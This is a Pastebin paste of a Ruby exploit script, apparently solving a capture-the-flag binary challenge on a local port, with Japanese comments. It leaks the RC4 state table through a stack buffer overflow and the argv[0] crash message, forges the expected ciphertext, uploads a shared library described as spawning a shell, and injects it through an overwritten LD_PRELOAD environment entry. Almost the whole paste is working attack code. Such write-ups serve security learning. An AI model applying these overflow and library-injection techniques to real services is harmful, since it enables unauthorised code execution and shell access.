Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # coding: ascii-8bit
- require 'ctf.rb'
- require 'hexdump'
- # Keyword
- # ・StackBOF => argv[0] leak
- # ・Share Library Injection
- # ・RC4
- Host = "localhost"
- Port = 8887
- def get_stable(offset = 0)
- puts "[+] RC4 S table leak by argv[0] leak".colorize(:red)
- Cpwn.open(Host, Port) do |c|
- payload = "\x00" * 0x118 # 0にしとくと暗号かされないで済む.strlenが0を返すので
- payload << p64(0x602160 + offset) # offset分足したアドレスからリークすることで"\x00"以降を抜き取る
- payload << "\n"
- c.send(payload)
- c.recv_until("detected ***: ")
- return c.recv_until(" terminated").gsub(" terminated", "")
- end
- end
- # RC4の処理をそのまま記述
- def rc4_prga(size, stable_origin)
- stable = Marshal.load(Marshal.dump(stable_origin)) # stabeleを使い回すためにコピーを作った
- i, j, output = 0, 0, ""
- size.times do
- i = (i + 1) % 256
- j = (j + stable[i]) % 256
- stable[j], stable[i] = stable[i], stable[j]
- c = stable[(stable[i] + stable[j]) % 256]
- output << c.chr
- end
- output
- end
- def rc4(s1, stable)
- s2 = rc4_prga(s1.length, stable)
- xored = ""
- s1.length.times do |i|
- xored << (s1[i].ord ^ s2[i].ord).chr
- end
- return xored
- end
- # argv[0] leakでは"\x00"で途切れてしまうので, \x00を追加したのち
- # もう一度その長さ分足したアドレスからleakしている.
- stable = get_stable(0)
- stable << "\x00"
- stable << get_stable(stable.length)
- Hexdump.dump(stable)
- stable = stable.chars.map(&:ord)
- Cipher = p64(0xf39fbfbd85aa3162, 0xe4ab23ac750c028a, 0x61c9bdef7a25c582)
- Cpwn.open(Host, Port) do |c|
- # 0x400c5b <main+318>: call 0x400840 <strcmp@plt>
- # arg[0]: 0x602120 --> output
- # arg[1]: 0x400da6 --> 0xf39fbfbd85aa3162
- # 0x400da6: 0xf39fbfbd85aa3162 0xe4ab23ac750c028
- # 0x400db6: 0x61c9bdef7a25c582
- buf = rc4(Cipher, stable)
- c.send(buf + "\n")
- puts c.recv_until("message")
- c.send(`cat mylib.so`) # upload shared library(shellを起動する)
- end
- Cpwn.open(Host, Port) do |c|
- # c.debug = true
- # envp[0] : 0x128
- # 実行中のプログラムでLD_PRELPAD=./messageに設定する
- buf = rc4(Cipher+"\0\0"+"LD_PRELOAD=./message\0", stable) + "\0"
- buf << " " * (0x128 - buf.length)
- buf << p64(0x60213a, 0x0)
- buf << "\n"
- c.send(buf)
- puts c.recv_until("message")
- c.hacked
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement